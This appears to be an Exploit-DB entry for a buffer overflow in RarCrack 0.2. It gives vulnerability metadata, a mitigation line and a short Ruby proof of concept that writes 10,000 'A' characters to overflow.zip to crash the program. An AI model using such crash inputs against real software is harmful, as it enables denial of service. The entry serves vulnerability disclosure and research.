Vendor: RarCrack
By: The_UnKn@wn
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: RarCrack
Affected Version From: 0.2
Affected Version To: 0.2
Patch Exists: NO
Related CWE: none
CPE: a:rarcrack:rarcrack:0.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: openSUSE 11.3
2010

RarCrack 0.2 Buffer Overflow POC

RarCrack does not check the length of the archive and crashes while cracking it.

Mitigation:

Input validation should be used to prevent buffer overflows.

Exploit-DB raw data:

#!/usr/bin/env ruby
#  overflow.rb
#
#    __________  ____  __  ______  _________
#   / ____/ __ \/ __ \/ / / / __ \/ ____<  /
#  / / __/ /_/ / / / / / / / /_/ /___ \ / / 
# / /_/ / _, _/ /_/ / /_/ / ____/___/ // /  
# \____/_/ |_|\____/\____/_/   /_____//_/   
#                                         
#
# 	Title: 		RarCrack 0.2 Buffer Overflow POC
# 	Date: 		19.09.2010
# 	Author: 	The_UnKn@wn
# 	Email:		the_unknown [at] group51.org
# 	Twitter:	@The_UnKn0wn
# 	Homepage:	http://group51.org 	
# 	Software Link: 	http://sourceforge.net/projects/rarcrack/files/rarcrack-0.2/%5BUnnamed%20release%5D/rarcrack-0.2.tar.bz2/download
# 	Version: 	0.2
# 	Tested on: 	openSUSE 11.3
# 	CVE: 		none 
#
#	Impact:		RarCrack doesn't check the length of the archive and while cracking it crashes.
#
#	Usage: 
#		$ ruby overflow.rb
#		$ ./rarcrack overflow.zip
#		

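# Payload: 10,000 "A" characters, not a valid archive.
text = "A" * 10000

# Write the payload to overflow.zip, the file passed to rarcrack in the usage above.
File.open("overflow.zip", "w") do |l|
  l.puts(text)
end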